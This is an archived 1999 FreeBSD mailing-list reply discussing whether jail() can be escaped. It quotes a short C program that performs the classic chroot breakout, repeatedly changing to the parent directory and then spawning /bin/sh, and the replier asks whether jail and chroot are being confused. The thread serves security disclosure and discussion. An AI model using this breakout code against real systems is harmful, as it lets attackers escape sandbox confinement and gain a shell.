Date: Sat, 25 Sep 1999 15:38:29 +0200
From: Harold Gutch <logix@foobar.franken.de>
To: Alexander Bezroutchko <abb@zenon.net>, freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject: Re: about jail
Message-ID: <19990925153829.B14097@foobar.franken.de>
In-Reply-To: <19990925171712.A80535@zenon.net>; from Alexander Bezroutchko on Sat, Sep 25, 1999 at 05:17:12PM +0400
References: <199909251302.RAA58030@grendel.sovlink.ru> <19990925171712.A80535@zenon.net>

On Sat, Sep 25, 1999 at 05:17:12PM +0400, Alexander Bezroutchko wrote:
> * it is possible to escape from jail
>   Following program escapes from jail (tested under 4.0-19990918-CURRENT):
>
> /* --- start of example ------------------------- */
> #include <unistd.h>
> #include <assert.h>
>
> const char *shell = "/bin/sh";
> const char *lowerdir = "/tmp";
>
> int main() {
>         int i;
>
>         assert(chdir("/") != -1);
>         assert(chroot(lowerdir) != -1);
>         for (i = 0; i < 32; i++)
>                 assert(chdir("..") != -1);
>         assert(chroot(".") != -1);
>
>         assert(execl(shell, shell, NULL) != -1);
> };
> /* --- end of example --------------------------- */
>

I don't run -CURRENT, so I can't test this - but this is the standard
chroot()-breakout, and you're saying that using it you can break out of
a _jail_ as well? Or are you simply mixing up jail() and chroot()?

bye,
  Harold

--
<Shabby> Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998 #unix, ircnet